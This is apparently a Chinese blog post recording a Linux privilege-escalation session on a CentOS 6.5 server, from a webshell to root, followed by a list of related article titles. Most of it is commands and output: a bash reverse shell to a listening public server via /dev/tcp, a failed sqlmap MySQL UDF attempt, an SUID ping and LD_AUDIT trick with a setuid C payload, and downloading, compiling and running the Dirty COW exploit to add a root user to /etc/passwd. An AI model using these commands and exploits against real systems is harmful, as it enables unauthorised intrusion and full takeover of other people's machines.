提权过程试了好几种方法。使用反向连接得到webshell,得到内核版本等信息

#公网服务器使用nc监听

nc -lvvp 1234

#目标机器上执行命令

bash -i >& /dev/tcp/公网服务器IP/端口 0>&1

[www@centos]$ whoami

www

[www@centos]$ uname -a

uname -a

Linux centos 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

[www@centos]$ lsb_release -a

lsb_release -a

LSB Version::base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:

graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch

Distributor ID:CentOS

Description:CentOS release 6.5 (Final)

Release:6.5

Codename:Final

[www@centos]$ python -c 'import pty;pty.spawn("/bin/sh")' #模拟tty

首先尝试了mysql的udf提权,恰好3306端口也是开放的。直接使用了sqlmap

sqlmap -d mysql://root:@IP:PORT/DBname --os-shell

#然后选择操作系统位数

然而并未成功,使用ps aux查看发现mysql是以mysql用户启动的,没有权限写plugin目录

然后尝试利用/tmp结合ping提权(suid)

find / -user root -perm -4000 -print 2>/dev/null #查找具有suid权限的文件

cd /tmp

mkdir exploit

ln /bin/ping /tmp/exploit/target

exec 3< /tmp/exploit/target#把/tmp/exploit/target定义为文件描述符3

rm -rf /tmp/exploit/

#建立payload.c

**********************************************

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

***********************************************

gcc -W -fPIC -shared -o /tmp/exploit payload.c

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 #定义环境变量

但是不知道为什么前面所有的都执行正常 ,最后一句执行完后连接直接断开了,无奈换其他方法。

使用“Dirty COW”漏洞exp提权

[www@centos tmp]$ curl https://www.exploit-db.com/download/40839 > exp.c #下载exp代码

exp.c

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

100 5006 100 5006 0 0 3768 0 0:00:01 0:00:01 --:--:-- 6476

[www@centos tmp]$ gcc -pthread exp.c -o exp -lcrypt #编译

gcc -pthread exp.c -o exp -lcrypt

[www@centos tmp]$ ./exp #执行

./exp

Please enter the new password: testtest #输入密码,用户名默认firefart

/etc/passwd successfully backed up to /tmp/passwd.bak

Complete line:

firefart:fiJIjOetSxcCE:0:0:pwned:/root:/bin/bash

mmap: **********

ptrace 0

Done! Check /etc/passwd to see if the new user was created.

You can log in with the username 'firefart' and the password 'testtest'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd #通过在etc/passwd下添加ROOT权限的用户

然后使用ssh工具成功登上

[firefart@centos ~]# id

uid=0(firefart) gid=0(root) groups=0(root)

[firefart@centos ~]#

linux系统漏洞firefart,记:从文件上传漏洞到获得root权限相关推荐

  1. 最新系统漏洞--Victor CMS任意文件上传漏洞

    最新系统漏洞2021年11月25日 受影响系统: Victor CMS Victor CMS 1.0 描述: Victor CMS是尼日利亚Victor Alagwu软件开发者的一套开源的内容管理系统 ...

  2. java web 上传图片漏洞_Web安全:文件上传漏洞

    原标题:Web安全:文件上传漏洞 一般将文件上传归类为直接文件上传与间接文件上传.直接文件上传就是服务器根本没有做任何安全过滤,导致攻击者可以直接上传小马文件及大马文件(如ASP.ASPX.PHP.J ...

  3. nginx 上传文件漏洞_浅谈文件上传漏洞(其他方式绕过总结)

    前言 上一篇文章简单的介绍了绕过客户端检测,现在总结一下其他方式绕过. 正文 1.1 服务端MIME类型检测绕过 检测原理:用户上传文件时,服务器会获取这个文件的MIME值,与事先设置好的进行比对,如 ...

  4. 文件上传漏洞-原理篇

    目录 第1章 文件上传漏洞基础 1.1 漏洞概述 1.2 漏洞成因 1.3 漏洞危害 1.4 漏洞利用姿势 第2章 文件上传漏洞检测与绕过 2.1 前端检测和绕过 2.2 服务器端检测和绕过 第3章 ...

  5. Web安全-文件上传漏洞与WAF绕过

    文章目录 概述 Webshell简述 上传漏洞原理 上传漏洞绕过 解析漏洞 IIS 6.0解析漏洞 Apache解析漏洞 Nginx解析漏洞 Windows文件命名 客户端检测绕过 更改前端JS代码 ...

  6. web安全之文件上传漏洞攻击与防范方法

    一. 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等.这种攻击方式是最为直接和有效 ...

  7. 畅捷通T+ v17任意文件上传漏洞复现

    1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...

  8. 2022渗透测试-文件上传漏洞的详细讲解

    目录 1.什么是文件上传漏洞 2.生成图片木马 3.靶场 1.第一关 2.前端检测(第二关) 3.服务器端检测--MIME类型(第二关) 4.服务器端检测--文件类型(第十四关) 5.服务器文件内容验 ...

  9. 【网络安全】文件上传漏洞及中国蚁剑安装

    文件上传漏洞 描述 中国蚁剑安装 1. 官网下载源码和加载器 2.解压至同一目录并 3.安装 4.可能会出现的错误 文件上传过程 必要条件 代码示例 dvwa靶场攻击示例 1.书写一句话密码进行上传 ...

  10. 文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)

    文件上传漏洞 什么是文件上传漏洞 什么是webshell 一句话木马大全 产生文件上传漏洞的原因 文件上传漏洞的攻击与防御方式 1.前端限制 2.检查扩展名 1.黑名单策略, 2.白名单策略 3.检查 ...

最新文章

  1. C++中map容器的说明和使用技巧
  2. rmd转换html怎么换页,如何在由RStudiomarkdown生成的单词文档中添加分页符
  3. PMCAFF产品经理第一课 | 杭州站 现场集锦
  4. (二)spring cloud微服务分布式云架构-整合企业架构的技术点
  5. SpringCloud -创建统一的依赖管理
  6. python 多个配置文件_django中如何如何针对不同的环境使用多个配置文件?
  7. 当强人工智能时代来临,哪些人不会失业?
  8. 【珍藏】 2012.NET开发必看资料53个+经典源码77个—下载目录
  9. SpringCloud工作笔记074---Idea2018 1.6发现不支持@Slf4j,@Getter ,@Setter注解
  10. [vscode] 使用正则表达式进行搜索
  11. 关于TCP/IP协议
  12. 北京二手房价分析及预测
  13. 本地IDEA连接服务器的Redis报错处理
  14. python爬取微信好友头像_使用python itchat包爬取微信好友头像形成矩形头像集的方法...
  15. 联想笔记本屏幕扩展快捷键用不了
  16. 「地埋式积水监测站」智慧防汛,科技先行
  17. Mybatis关于int类型字段的判断
  18. The.Strain血族
  19. 困在赛博世界里的“仿生机器人”
  20. linux挂载实验箱闹钟,Linux/Ubuntu命令行下打造一个音乐闹钟

热门文章

  1. 小ck活动机器人包包_2018爆款包:不是LV,Gucci而是平价小CK~
  2. Linux系统tar、rar、7z、zip压缩解压缩命令使用
  3. dubbo服务暴露与注册
  4. hdu5745 La Vie en rose【dp+bitset优化】
  5. GY-BMP280-3.3 高精度大气压强传感器模块
  6. SequoiaDB分布式数据库2022.1月刊
  7. 我在云栖社区读硕士,大数据专业
  8. VINS-MONO边缘化策略
  9. vue 判断字符串是否是英文_Vuejs Element input组件区分中英文 统计长度
  10. linux audit 源码分析,audit初探